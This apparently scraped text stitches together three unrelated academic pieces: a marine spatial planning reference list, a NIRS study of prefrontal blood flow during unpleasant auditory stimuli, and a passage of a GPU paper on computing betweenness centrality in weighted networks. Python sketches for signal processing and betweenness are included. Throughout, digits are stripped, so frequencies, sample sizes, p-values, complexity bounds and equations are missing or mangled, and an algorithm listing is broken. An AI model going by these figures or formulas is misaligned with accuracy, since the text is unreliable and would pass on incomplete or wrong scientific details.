c, barbanti a. a. a modelling framework for msp-oriented cumulative effects assessment. ecological indicators : – doi . /j.ecolind. . . . menegon s, depellegrin d, farella, sarretta a, venier c, barbanti a. b. addressing cumulative effects, maritime conflicts and ecosystem services threats through msp-oriented geospatial webtools. ocean & coastal management : – doi . /j.ocecoaman. . . . ogc—open geospatial consortium inc. . opengis web map server implemen- tation specification. pınarbaşı k, galparsoro i, borja Á, stelzenmüller v, ehler cn, gimpel a. . 
decision support tools in marine spatial planning: present applications, gaps and future perspectives. marine policy : – doi . /j.marpol. . . . qgis development team. . qgis geographic information system. open source geospatial foundation project. available at https://www.qgis.org/ (accessed on february ). shen h. . interactive notebooks: sharing the code. nature : – doi . / a. stelzenmüller v, lee j, south a, foden j, rogers si. . practical tools to support marine spatial planning: a review and some prototype tools. marine policy : – doi . /j.marpol. . . . stock a. . open source software for mapping human impacts on marine ecosystems with an additive model. journal of open research software ( ):e doi . /jors. . van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science engineering : – doi . /mcse. . . warmerdam f. . the geospatial data abstraction library. in: hall gb, leahy mg, eds. open source approaches in spatial data handling. berlin, heidelberg: springer berlin heidelberg, – doi . / - - - - _ . white c, halpern bs, kappel cv. . ecosystem service tradeoff analysis reveals the value of marine spatial planning for multiple ocean uses. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. .
measurement of brain activity related to unpleasant emotion in the prefrontal cortex region using nirs
haruki kawanaka, atsushi nagase, koji oguri, graduate school of information science and technology, aichi prefectural university, japan, kawanaka@ist.aichi-pu.ac.jp
abstract. we noninvasively measured the blood-flow (hemoglobin concentration) response in the prefrontal cortex area caused by the arousal of unpleasant emotion, using near-infrared spectroscopy (nirs). compared with other measurement methods, nirs measures brain activity easily and imposes a low load on subjects. in this study, auditory stimuli were applied to subjects in order to arouse unpleasant emotions, and the changes in blood flow were measured at that time. as a result, we confirmed a significant increase of the oxygenated hemoglobin concentration in the peripheral cortex (brodmann area ) associated with the evoked unpleasant emotion, which demonstrates the effectiveness of nirs in measuring emotion-related brain activity. keywords: near-infrared spectroscopy, unpleasant emotion, prefrontal cortex, auditory stimuli, brain activity
. introduction
an emotion is one of the important functions of the brain. emotions are of various types, such as fear, anger and joy. in this study we differentiate between pleasant and unpleasant emotion.
it has been known that humans and other animals show approach behavior toward things they prefer (e.g., foods), while showing escape or aggressive behavior toward things that anger, frighten or displease them (e.g., predators and dangers). the former is known as positive emotional behavior, and the latter as negative emotional behavior. the brain activities which cause these behaviors are called positive (pleasant, comfort) and negative (unpleasant, discomfort) emotion. it is becoming clear that the limbic system structures, including the amygdala, have an important role in the expression of emotions, and a relationship between emotion and the prefrontal cortex, which forms the anterior part of the frontal lobe, has also been reported. in recent years, non-invasive measurement of brain activity has elucidated many aspects of brain function. near-infrared spectroscopy (nirs) is a non-invasive measurement technique that uses near-infrared light to measure changes of brain activity, especially the blood flow (hemoglobin concentration) in cortical areas. nirs imposes a low load on the subjects and has the advantage of being easy to measure in comparison with functional magnetic resonance imaging (fmri) and positron emission tomography (pet). for example, during fmri and pet measurements the subject must maintain a supine posture, with a sense of confinement, inside the device. in addition, fmri produces loud device noise, and pet carries a possibility of radiation exposure due to the radioactive solution injected into the body. therefore, if emotion-related brain activity is measured using pet or fmri, the emotions of the subject could be affected by the measurement itself. nirs, with its lower load compared with those methods, is a more suitable method to measure brain activities related to emotions. in this study, we focus on unpleasant emotions and analyze blood flow changes measured by nirs in the prefrontal cortex area related to unpleasant emotion evoked by auditory stimuli. . unpleasant emotion a. emotion and prefrontal cortex. the amygdala in the limbic system is one of the most important structures for emotion; it is considered to be involved in the expression of pleasant or unpleasant emotion based on the valuation and meaning given to stimuli. in previous research on emotion-related brain activity, brain activities during the application of sensory stimuli have been measured by pet or fmri. zald et al. measured brain activity using pet and reported activity in the amygdala associated with unpleasant emotions evoked by auditory stimuli. in addition to the limbic system, the prefrontal cortex is believed to relate to emotion. the prefrontal cortex is thought to have close fibrous connections with structures such as the amygdala and to play a key role in emotion and motivation, and it has been reported that the prefrontal cortex works to control or cooperate with the limbic system. thus, the prefrontal cortex is closely related to the areas involved in the expression of emotion, such as the limbic system, and nirs can capture the blood-flow reaction associated with emotion by measuring at the prefrontal cortex. b. auditory stimuli to evoke unpleasant emotion. visual, auditory and olfactory stimuli have generally been used as stimuli to evoke emotion. auditory stimuli can be applied easily and continuously, and elicit an emotional arousal with small individual differences. therefore, in this study we use auditory stimuli as the sensory stimulation to evoke emotion, in particular unpleasant emotions.
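for concreteness, the following minimal sketch synthesizes the two kinds of auditory stimuli used below, a pure sine tone and white noise; the sample rate, duration, frequencies and amplitudes are illustrative assumptions, not the parameters reported in this study.

```python
import numpy as np
from scipy.io import wavfile

FS = 44100            # sample rate in hz (assumed)
DURATION = 10.0       # stimulus length in seconds (assumed)
t = np.arange(int(FS * DURATION)) / FS

def sine_tone(freq_hz, amplitude=0.5):
    """Pure tone of the given frequency, e.g., a candidate unpleasant stimulus."""
    return amplitude * np.sin(2 * np.pi * freq_hz * t)

def white_noise(amplitude=0.5, seed=0):
    """Gaussian white noise clipped to [-1, 1]."""
    rng = np.random.default_rng(seed)
    return np.clip(amplitude * rng.standard_normal(t.size), -1.0, 1.0)

# write 16-bit wav files that can be presented through earphones
for name, wave in [("tone_high.wav", sine_tone(4000.0)),   # frequency is an assumption
                   ("tone_low.wav", sine_tone(250.0)),     # frequency is an assumption
                   ("white_noise.wav", white_noise())]:
    wavfile.write(name, FS, (wave * 32767).astype(np.int16))
```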
a preliminary experiment was conducted to determine the auditory stimuli which can effectively evoke unpleasant emotion. a white noise and seven sine waves with different frequencies were used as auditory stimuli. the sine waves frequency are [hz], [hz], [hz], [khz], [khz], [khz], [khz]. the healthy subjects listened to auditory stimuli for seconds, judged pleasant/unpleasant on a scale of - to ('- ' corresponds to the most unpleasant, ' ' the most pleasant). fig. . is the result which shows the average and standard deviation of the judgments of all subjects. when a sine wave was present, the average grade has been generally negative. subjects responded to the unpleasant at almost sine waves. the more the frequency increases, the more the unpleasant degree increases. in particular, [khz] has the lowest average grade - . and the standard deviation is small compared to other. on the other hand, the average grade of [hz] sine wave is - . , and it is close to zero. in other words, [hz] sine wave is an auditory stimulus which there is very little effect to evoke unpleasant emotion. white noise has average grade - . , it shows white noise tends to evoke unpleasant emotion. white noise has been used as a control stimulus which can't evoke both pleasant and unpleasant emotions in a previous study [ ]. however, using white noise as a control stimulus is not reasonable. in this study, we use [khz] sine wave as an auditory stimuli to evoke unpleasant emotion (unpleasant stimulus), and [hz] sine wave as control stimulus. fig. ratings of pleasant vs. unpleasant . measurement and analysis methods in nirs a. nirs (near-infrared spectroscopy). near-infrared spectroscopy is one of the brain activity measurement techniques which quantify the blood flow changes (hemoglobin concentration) in cortical areas using near-infrared light which is high permeability to the body. near-infrared light irradiated from the optical transmission fiber reaches to the cerebral cortex while being diffused and absorbed at the scalp, skull and cerebrospinal fluid. the amount of the transmitted light came back again on the scalp from the cortex is measured by receiving fiber. in a bloodstream, ther e are two kinds of hemoglobin i.e. oxygenated hemoglobin (oxy-hb) and deoxygenated hemoglobin (deoxy-hb). oxy-hb and deoxy-hb absorption spectrum is different, so it is possible to calculate the concentration of each hemoglobin based on the amount of transmitted light. when the blood vessels expand in association with the neural activity, arterial blood which includes rich glucose and oxygen as an energy source is adjusted. such adjustment mechanism is called neuro-vascular coupling and known as a regional cerebral blood flow (rcbf) increases by this mechanism. thus, the increase of rcbf means an existence of neural activity in the region [ ]. and if rcbf has been increased, oxy-hb increases and deoxy-hb decreases in the venous capillary. we can obtain the concentration of hemoglobin in the capillaries of the cortical areas from the nirs signal. nirs signal where the concentration of oxy-hb increases and the concentration of deoxy-hb decreases show that neural activity has occurred around the area. b. measuring method. four healthy male subjects which were - years old (average . ) were conducted with informed consent and participated in experiments. as shown in fig. , one trial was set as a series of a rest for seconds (former rest), an infliction of auditory stimuli for -second (task) and a rest for seconds (latter rest). 
each subject was instructed to gaze at a '+' sign on a screen in front of him in a sitting posture during the trial, to empty his mind during both rests, and to focus on the auditory stimuli during the task. also, the experimental laboratory was kept dark to prevent the subjects from distraction. fig. time sequence of a trial fig. optical fibers and channels the unpleasant emotional stimulus and the control stimulus were presented through earphones attached to both ears of the subject. the optical brain-function imaging system was a foire- (shimadzu). the sampling frequency of the oxy-hb and deoxy-hb concentrations was [hz]. in order to measure the prefrontal cortex region, optical transmitting and receiving fibers were attached to the forehead of the subject. as shown in fig. , channels were measured in all. channel and channel correspond to fp and fp in the international - method. the data signals of trials for each stimulus were obtained using nirs one by one, and whether emotional discomfort had been evoked in the subject was confirmed every trials. c. analysis method. ) step : pretreatment. the raw signal measured by nirs is shown in fig. (a). it is the hemoglobin concentration change of channel during trials for the unpleasant emotional stimulus. the solid line corresponds to the oxy-hb concentration and the dashed line to the deoxy-hb concentration in fig. . because the original signal contains artifacts such as noise and pulse-rate variability, a removal processing was performed using a th-order butterworth low-pass filter with a cutoff of . [hz]. in addition, the nirs signal is known to show baseline drift [ ]. to reduce this baseline variation, a baseline correction was applied on the basis of the former rest of each trial. the baseline correction was performed by taking the difference between $x_n(t)$ (the raw data at time $t$ in the $n$-th trial) and $\bar{x}_n$ (the average over the former rest of the $n$-th trial): $b_n(t) = x_n(t) - \bar{x}_n$ ( ), where $b_n(t)$ is the value after baseline correction. fig. (b) shows the nirs signal after the preprocessing. (a) (b) fig. original signals of nirs and denoised signals after preprocessing ) step : averaging. averaging is often used to detect changes in hemoglobin concentration by the type of task. because averaging improves the s/n ratio, the components related to the task can be extracted efficiently. in addition, we performed grand averaging over the data of all subjects by the type of task. however, if the grand-average waveform is obtained directly from all subjects' data, it is difficult to analyze because of differences in trends between subjects. thus, the grand averaging was calculated after normalizing the preprocessed signals of each subject by z-score, such that the mean over the former rests of all trials of each subject is and the standard deviation is (eq. ): $z(t) = \{x(t) - \bar{x}_f\}/\sigma_f$ ( ), where $\bar{x}_f$ is the average hemoglobin concentration over the former rest and $\sigma_f$ is the standard deviation over the former rest. because the change in hemoglobin concentration during the former rest reflects neural activity at rest, normalizing with respect to the former rest allows comparison between subjects. ) step : statistical analysis. in general, measurements of brain activity using fmri and pet judge the presence and intensity of brain activity by statistical analysis. in this study, a t-test on the changes of hemoglobin concentration was performed using welch's t-test, in accordance with the previous study [ ].
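a minimal sketch of the preprocessing and normalization steps just described (low-pass filtering, per-trial baseline correction against the former rest, and z-scoring against the former-rest statistics); the sampling rate, cutoff frequency and rest duration are assumptions, since the corresponding values are not legible here.

```python
import numpy as np
from scipy.signal import butter, filtfilt

FS = 10.0          # sampling frequency in hz (assumed)
CUTOFF = 0.5       # low-pass cutoff in hz (assumed)
REST_S = 15        # former-rest duration in seconds (assumed)

# 4th-order butterworth low-pass, applied forward and backward (zero phase)
b, a = butter(4, CUTOFF / (FS / 2.0), btype="low")

def preprocess_trial(raw):
    """raw: 1-d oxy-hb (or deoxy-hb) signal of one trial, former rest first."""
    filtered = filtfilt(b, a, raw)                # remove noise / pulse-rate artifacts
    rest = filtered[: int(REST_S * FS)]           # samples of the former rest
    return filtered - rest.mean()                 # baseline correction b_n(t)

def zscore_against_rest(trials):
    """z-score all (preprocessed) trials of one subject against the mean and
    standard deviation of their former-rest samples."""
    rests = np.concatenate([tr[: int(REST_S * FS)] for tr in trials])
    mu, sigma = rests.mean(), rests.std()
    return [(tr - mu) / sigma for tr in trials]   # z(t) = (x(t) - mean_f) / sd_f

# the grand average is then the mean of these z-scored trials across subjects
```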
also, the visualization image was created by mapping based on t-value and two-dimensional interpolation using the inverse distance weighted. . results and discussion fig. shows the result measured at channel in the case of the control stimulus, fig. shows in the case of the unpleasant emotional stimulus. regardless of whether the stimulus was unpleasant, oxy-hb concentration began to increase shortly after start of task, to decline before the end of the task. on the other hand, deoxy-hb concentration has been decreasing from the start of the task. generally, since rcbf increases in association with the neural activity by neuro-vascular coupling, nirs signal at the area has a tendency to increase in oxy-hb concentration and to decrease in deoxy-hb concentration. averaged waveforms show changes of hemoglobin concentration related in the neural activity. the oxygen consumption and glucose metabolism increases at neuron cell by the neural activity, accordingly cerebral blood flow begins to increase after an interval of about three seconds [ ]. the average waveform of oxy-hb concentration which was obtained in this study shows increase from after a few seconds of stimulus in the same way. in the control stimulus versus the unpleasant emotional stimulus, the degree of increase in the concentration of oxy- hb at the case of the unpleasant emotional stimulus is larger. this is presumed that the control stimulus evokes neural activity related to only the perception of auditory stimuli, and the unpleasant emotional stimulus caused neural activity related to not only the perception of stimuli but also the evoked emotion. fig. shows the grand averaging waveform of oxy-hb concentration at every channel. the oxy-hb concentration waveform for the unpleasant emotional stimulus significantly increased at almost channels. in addition, oxy-hb concentration for the control stimulus is increased at latter rest section of several channels. in order to compare the change of oxy-hb concentration when auditory stimuli were applied, we evaluated the mean values for the former rest and the task in each trial by t-test. fig. shows the comparison between the former rest and the task of the control stimulus, and fig. shows the former rest and the task of the unpleasant emotional stimulus. the mark '*' in the figures indicates p < . significance level, the mark '**' indicates p < . significance level that the channel confirmed a significant increase in oxy-hb concentration. fig. averaging waveforms unpleasant emotional stimulus presentation at ch fig. averaging waveforms for control stimulus presentation at ch fig. averaging waveforms of oxy-hb concentration in all channels fig. visualization of t-values obtained by comparison of oxy-hb conc. during control stimulus and rest fig. visualization of t-values obtained by comparison of oxy-hb conc. during unpleasant emotional stimulus and rest in the case of the control stimulus, the concentration of oxy-hb significantly increased with p < . significance level at channel and p < . significance level at channel , and . the oxy-hb concentration had positive t- value on the whole and tended to increase. especially, markedly increase was observed in the lower part of measurement area. in the case of the unpleasant emotional stimulus, a significant increase in concentration of oxy-hb was observed with p < . significance level at the overall measured area. 
as described above, the neural activity associated with both the evocation of unpleasant emotion and the perception of the auditory stimuli is thought to be the cause of this increase. to compare the change in oxy-hb concentration when the unpleasant emotional stimulus was presented, we compared, by t-test, the mean values during the task with the unpleasant emotional stimulus and during the task with the control stimulus in each trial. fig. shows the comparison of oxy-hb concentration between the unpleasant emotional stimulus and the control stimulus. the concentration of oxy-hb significantly increased at the p < . level at channels and , and at the p < . level at channels , , and . in addition, the oxy-hb concentration significantly decreased at the p < . level at channel . a marked increase was observed especially in the upper part of the measurement area. fig. : visualization of t-values obtained by comparing oxy-hb concentration during the unpleasant emotional stimulus and the control stimulus. conclusions. in this study, we non-invasively measured blood flow in the prefrontal cortex using nirs while auditory stimuli were presented. a [khz] sine wave was presented to the subjects as the unpleasant emotional stimulus, and a [hz] sine wave was used as the control stimulus. comparing the control stimulus with the unpleasant emotional stimulus, a significant increase in oxy-hb concentration was found around brodmann's area . a blood-flow response associated with unpleasant emotion was thus obtained using nirs, suggesting that nirs can measure emotion-related brain activity with a low burden on the subjects. future work will extend the nirs measurements to a variety of emotions for application to brain-machine interfaces. acknowledgment. a part of this research was supported by a grant from the artificial intelligence research promotion foundation (no. - ). references. [1] m. jueptner and c. weiller, "does measurement of regional cerebral blood flow reflect synaptic activity? implications for pet and fmri", neuroimage. [2] d.h. zald and j.v. pardo, "the neural correlates of aversive auditory stimulation", neuroimage. [3] b. chance, z. zhuang, c. unah, c. alter and l. lipton, "cognition-activated low-frequency modulation of light absorption in human brain", proc. natl. acad. sci. usa. [4] p.a. bandettini, e.c. wong, r.s. hinks, r.s. tikofsky and j.s. hyde, "time course epi of human brain function during task activation", magnetic resonance in medicine. [5] w. niide, t. tsubone, y. wada, "discrimination of moving limb by near infrared spectroscopic measurement of brain activation", transactions of ieice. a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks. rui fan, ke xu and jichang zhao. state key laboratory of software development environment, beihang university, beijing, pr china; school of economics and management, beihang university, beijing, pr china. abstract. betweenness, a widely employed centrality measure in network science, is a decent proxy for investigating network loads and rankings. however, its extremely high computational cost greatly hinders its applicability in large networks.
although several parallel algorithms have been presented to reduce its calculation cost for unweighted networks, a fast solution for weighted networks, which are commonly encountered in many realistic applications, is still lacking. in this study, we develop an efficient parallel gpu-based approach to boost the calculation of the betweenness centrality (bc) for large weighted networks. we parallelize the traditional dijkstra algorithm by selecting more than one frontier vertex each time and then inspecting the frontier vertices simultaneously. by combining the parallel sssp algorithm with the parallel bc framework, our gpu-based betweenness algorithm achieves much better performance than its cpu counterparts. moreover, to further improve performance, we integrate the work-efficient strategy, and to address the load- imbalance problem, we introduce a warp-centric technique, which assigns many threads rather than one to a single frontier vertex. experiments on both realistic and synthetic networks demonstrate the efficiency of our solution, which achieves . � to . � speedups over the parallel cpu implementation. our algorithm is open-source and free to the community; it is publicly available through https://dx.doi.org/ . /m .figshare. . considering the pervasive deployment and declining price of gpus in personal computers and servers, our solution will offer unprecedented opportunities for exploring betweenness-related problems and will motivate follow-up efforts in network science. subjects distributed and parallel computing, network science and online social networks keywords parallel computing, gpu computing, betweenness centrality, weighted networks introduction as an emerging multidisciplinary research area, network science has attracted much attention from researchers of various backgrounds, such as computer science, biology and physics, in recent decades. in these contributions, the betweenness centrality (bc) is often applied as a critical metric for measuring the significance of nodes or edges (ma & sayama, ; freeman, ; barthélemy, ; abedi & gheisari, ; goh et al., ). for example, girvan and newman developed a community detection algorithm based on edge bc (girvan & newman, ), leydesdorff ( ) used centrality as an indicator of the interdisciplinarity of scientific journals and motter & lai ( ) established a model how to cite this article fan et al. ( ), a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks. peerj comput. sci. :e ; doi . /peerj-cs. submitted august accepted november published december corresponding author jichang zhao, jichang@buaa.edu.cn academic editor john owens additional information and declarations can be found on page doi . /peerj-cs. copyright fan et al. distributed under creative commons cc-by . https://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. mailto:jichang@�buaa.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ of cascading failures in which the load on a node is represented by its betweenness. however, the extremely high temporal and spatial complexity of the bc calculation greatly limits its applicability in large networks. before the landmark work of brandes ( ), the complexity of the algorithm for computing the bc was o(n ) in time and o(n ) in space. 
brandes ( ) reduced the complexity to o(n + m) in space and o(nm) and o(nm + n log n) in time for unweighted and weighted networks, respectively, where n is the number of vertices and m is the number of edges. however, this improved algorithm still cannot satisfy the requirements for scientific computations in the present era of information explosion, as an increasing number of unexpectedly large networks emerge, such as online social networks, gene networks and collaboration networks. for example, twitter has hundreds of millions of active users, who form an enormous online social network. however, calculating the bc of a weighted network with one million nodes may take approximately one year, which is an unsupportable time cost. existing parallel cpu algorithms may reduce this time to several months; however, this is still too expensive. because of this problem, there is a pressing need to develop faster bc algorithms for the exploration of diverse domains. general-purpose gpu (gpgpu) computing, which has high parallelization, provides an opportunity to employ parallel algorithms implemented on gpus to achieve better performance. for network-related problems, researchers have devoted efforts to conquering irregular graph structures using gpgpu techniques and have achieved higher performance than is possible with traditional sequential cpu algorithms (mitchell & frank, ; merrill, garland & grimshaw, ; wang et al., ; harish & narayanan, ; cong & bader, ). cuda, developed by nvidia corporation, is the most popular gpu computing framework, and some researchers have even used this framework to parallelize the brandes algorithm (shi & zhang, ; sariyüce et al., ; mclaughlin & bader, , ). however, previous works have concentrated on unweighted networks for simplicity, although to the best of our knowledge, many realistic networks are weighted ones. the most significant difference in the bc algorithm between unweighted and weighted networks is the shortest-path calculation. in weighted networks, the dijkstra algorithm should be used to solve the single-source shortest path (sssp) problem rather than the breadth-first search (bfs) algorithm. in previous work, many efforts have been devoted to developing a gpu version of the sssp problem using the well-known dijkstra algorithm (martin, torres & gavilanes, ; ortega-arranz et al., ; delling et al., ; davidson et al., ). although such algorithms have been successfully developed and presented, establishing a parallel version of the bc algorithm for weighted networks is nontrivial because the original sssp algorithm must be modified in many critical aspects for this task, and to the best of our knowledge, a suitable fast solution is still lacking. with the aim of filling this vital gap, we propose a fast solution using cuda for calculating the bc in large weighted networks based on previous gpu bc algorithms and sssp algorithms. to make our algorithm more efficient, we make efforts to optimize it by employing several novel techniques to overcome the influence of irregular network structures. real-world networks have many characteristics that can degrade the performance of fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gpu parallelization algorithms. for example, the frontier set of nodes is always small compared with the total number of vertices, especially for networks with large diameters. 
at the same time, the majority of the nodes do not need to be inspected in each step; hence, processing all vertices simultaneously, as is done in traditional algorithms, is wasteful. mclaughlin & bader ( ) proposed a work-efficient strategy to overcome this problem. another well-known issue is that the power-law degree distribution in realistic networks induces severe load imbalance. several methods have been proposed in previous studies to overcome this problem; e.g., jia et al. ( ) employed an edge parallel strategy to avoid load imbalance, and hong et al. ( ) addressed this problem by using a warp technique. in this paper, we systematically investigate the advantages and disadvantages of these previous methods and incorporate them into our algorithm to solve the above two problems. experiments on both real-world and synthetic networks demonstrate that our algorithm significantly outperforms the baseline gpu algorithm. our main contributions are as follows: � based on previous gpu-based parallel sssp and bc algorithms, we propose an efficient algorithm for calculating the bc for weighted networks, which achieves . � to . � speedups over the parallel cpu algorithm on realistic networks. � we compare the traditional node-parallel method with the work-efficient version and the warp-centric method. experiments on realistic networks and synthetic networks demonstrate that the combination of these two strategies performs better than either the basic node-parallel method or the individual strategies; it achieves an average speedup of . � over the baseline method on realistic networks. � we package our algorithm as a useful tool that can be used to calculate both node and edge bc on weighted networks. researchers can apply this tool to quickly and conveniently calculate bc values for weighted networks, especially large networks. the source code is publicly available through https://dx.doi.org/ . /m .figshare. . background first, we briefly introduce the well-known brandes algorithm and dijkstra algorithm based on preliminary definitions of a network and the bc. brandes algorithm a graph can be denoted by g(v, e), where v is the set of vertices and e is the set of edges. an edge can be denoted by (u, v, w), which means that there is a link of weight w connecting nodes u and v. if edge (u, v) exists, it can be traversed either from u to v or from v to u because we focus only on undirected graphs in this paper. for directed graphs, if only an edge (u, v) exists, then the algorithm will store only the edge (u, v) and will process only this edge when inspecting vertex u; it will ignore (v, u) when inspecting vertex v. thus, our algorithm can easily be extended to directed graphs. a path p = (s, : : : , t) is defined as a sequence of vertices connected by edges, where s is the starting node and t is the ending node. the length of p is the sum of the weights of the edges contained in p. d(s, t) is the distance between s and t, which is the length of the shortest path fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ connecting s and t. sst denotes the number of shortest paths from s to t. in accordance with these definitions, we have d(s, s) = , sss = , d(s, t) = d(t, s) and sst = sts for an undirected graph. sst(v) denotes the number of shortest paths from s to t that include v. 
based on these definitions, the bc can be defined as:

$c_B(v) = \sum_{s \ne v \ne t \in V} \frac{\sigma_{st}(v)}{\sigma_{st}}$ (1)

from this definition, the calculation of the bc can be naturally separated into two steps: first, compute d(s, t) and $\sigma_{st}$ for all node pairs (s, t); second, sum all pair dependencies, where a pair dependency is defined as $\delta_{st}(v) = \sigma_{st}(v)/\sigma_{st}$. the time complexity of the first step is o(mn) for an unweighted graph or o(mn + n^2 log n) for a weighted graph; the bottleneck of this naive algorithm is therefore the second step, which has a time complexity of o(n^3). brandes developed a more efficient bc algorithm with a time complexity of o(mn) for unweighted graphs and o(mn + n^2 log n) for weighted graphs. the critical point is that the dependency of a node v for a source node s satisfies

$\delta_s(v) = \sum_{u : v \in P_s(u)} \frac{\sigma_{sv}}{\sigma_{su}} \left(1 + \delta_s(u)\right)$

by applying this equation, we can accumulate the dependencies after computing the distances and numbers of shortest paths only from the source vertex s to all other vertices, rather than after computing the shortest paths for all pairs. we can easily develop a parallel version of the brandes algorithm for unweighted graphs because the graph is traversed as a tree using the bfs algorithm. given a source node s, the root of the tree is s, and the tree is produced by the bfs method in the first step. in the second step, dependencies related to the source node s are calculated from the leaves to the root of the tree, and nodes at the same level are isolated and have no influence on each other. as a result, the parallel version of the algorithm can simultaneously explore all nodes at the same level in both steps, thereby fundamentally accelerating the bc calculation. dijkstra algorithm. the dijkstra algorithm (dijkstra, ) and the floyd-warshall algorithm (floyd, ) are commonly employed to solve shortest-path problems. the dijkstra algorithm is more easily adaptable to the bc problem because the brandes algorithm accumulates dependencies after computing sssps rather than after finding and storing the shortest paths for all pairs. the dijkstra algorithm applies a greedy strategy to solve the sssp problem. in this algorithm, the source node is s, and once the shortest path from s to another node u is found, u is said to be settled. as seen in algorithm 1, all nodes in graph g are separated into two sets: the settled vertices and the unsettled vertices q. an array d is used to store tentative distances from s to all nodes. initially, q stores all nodes, d(s) = 0, and d(u) = ∞ for all other nodes. during each iteration, the node u with the shortest tentative distance d[u] (denoted by extract_min(q)) is selected and settled, which means that the shortest path to node u has been found and d[u] is set to the corresponding value. then, for each node v ∈ neighbors(u), if d[u] + w(u, v) < d[v], d[v] is updated to d[u] + w(u, v). the above procedure, in which one node is settled and the tentative distances of its neighbors are then updated, is repeated until q is empty, i.e., until all nodes in graph g have been settled. according to this description, the dijkstra algorithm has no parallel characteristics because it selects one frontier node in each iteration. however, this restriction can be loosened to allow several frontier vertices to be explored simultaneously, in a manner similar to the bfs parallel approach.
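For orientation, the sketch below is a minimal sequential CPU version of Brandes's two-step framework for weighted graphs: a Dijkstra pass from each source that also counts shortest paths and records predecessors, followed by dependency accumulation in reverse settling order. It only illustrates the equations above; it is not the paper's parallel GPU implementation.

```python
import heapq

def betweenness_weighted(adj):
    """adj: {u: [(v, w), ...]} undirected positively weighted graph; returns {v: bc}."""
    bc = {v: 0.0 for v in adj}
    for s in adj:
        # step 1: Dijkstra from s, counting shortest paths and recording predecessors
        dist = {v: float("inf") for v in adj}
        sigma = {v: 0 for v in adj}
        preds = {v: [] for v in adj}
        dist[s], sigma[s] = 0.0, 1
        order, heap = [], [(0.0, s)]
        while heap:
            d, u = heapq.heappop(heap)
            if d > dist[u]:
                continue                       # stale heap entry
            order.append(u)                    # u is settled here
            for v, w in adj[u]:
                nd = d + w
                if nd < dist[v]:
                    dist[v], sigma[v], preds[v] = nd, sigma[u], [u]
                    heapq.heappush(heap, (nd, v))
                elif nd == dist[v]:
                    sigma[v] += sigma[u]
                    preds[v].append(u)
        # step 2: accumulate dependencies from the farthest settled vertex back to s
        delta = {v: 0.0 for v in adj}
        for w in reversed(order):
            for u in preds[w]:
                delta[u] += sigma[u] / sigma[w] * (1.0 + delta[w])
            if w != s:
                bc[w] += delta[w]
    # note: each unordered pair is counted from both endpoints; halve for the usual
    # undirected convention if needed.
    return bc

adj = {
    "a": [("b", 1.0), ("c", 2.0)],
    "b": [("a", 1.0), ("c", 1.0), ("d", 2.0)],
    "c": [("a", 2.0), ("b", 1.0), ("d", 1.0)],
    "d": [("b", 2.0), ("c", 1.0)],
}
print(betweenness_weighted(adj))
```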
related work graph traversal strategies for unweighted networks, the brandes algorithm applies the traditional bfs strategy in the shortest-path step. the bfs algorithm produces a traversal tree, which can later be used in the dependency accumulation step. this behavior makes it easy to parallelize both steps of the unweighted bc algorithm; i.e., threads are assigned to all vertices in the graph, and if a vertex is in the frontier set, the relevant thread traverses all edges connected to that vertex. jia et al. ( ) implemented their bc algorithm based on this node-parallel traversal strategy. however, this simple strategy induces a problem of load imbalance since the degrees of different vertices varies, especially in scale-free networks. threads processing low-degree vertices must wait for threads processing high-degree vertices, which significantly slows down the calculation. instead of assigning threads to all vertices, jia et al. ( ) proposed an edge-parallel strategy in which threads are assigned to all edges and edges that are connected to frontier vertices are then inspected. this technique eliminates the load-imbalance problem. jia et al. applied both coarse-grained and fine- grained parallelism. in a modern gpu, the kernel can employ multiple blocks, and each block contains multiple threads. in their program, the gpu employs multiple blocks, each of which focuses on one root vertex s (coarse-grained parallelism). the threads within each block work cooperatively to traverse the edges in both the sssp step and the dependency accumulation step (fine-grained parallelism). as a result, in each block, algorithm sequential dijkstra algorithm. : q ) empty set : for v ∈ v do : d[v] ) ∞ : add v to q : d[s] ) : while q is not empty do : u ) extract_min(q) : for v ∈ neighbors(u) do : d[v] ) d[u] + weightuv fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the dependencies of all vertices related to s are covered. for a vertex w, the dependency for the root vertex s is denoted by �s[w]. based on the brandes algorithm, the betweenness of w can be calculated as p s ¼w v �s½w�. work-efficient technique in the edge- and node-parallel strategies, threads are assigned to all vertices or edges, respectively, and the algorithm then checks whether the vertices and edges need to be inspected; this incurs a considerable unnecessary cost because the frontier nodes might be small in size, especially for graphs of large diameters. to address this problem, mclaughlin & bader ( , ) proposed an excellent work-efficient technique. in this method, a queue qcurr that stores the frontier vertices is maintained, and threads are assigned only to vertices that are in qcurr. in the bfs procedure, new frontier nodes are added to qnext. after the bfs step, the vertices in qnext are transferred to qcurr, and qnext becomes an empty queue. to implement this technique, it is necessary to know the lengths of both queues (qcurr_len and qnext_len) because qcurr and qnext are implemented using arrays in the gpu kernel code. for the parallel bc algorithm proposed in this paper, we develop a work-efficient version of the algorithm based on this idea. the issue of load-imbalance the work-efficient algorithm still suffers from the load-imbalance problem since it is based on the node-parallel strategy. in addition to the edge-parallel strategy, other techniques have also been developed to solve this problem (davidson et al., ; hong et al., ). hong et al. 
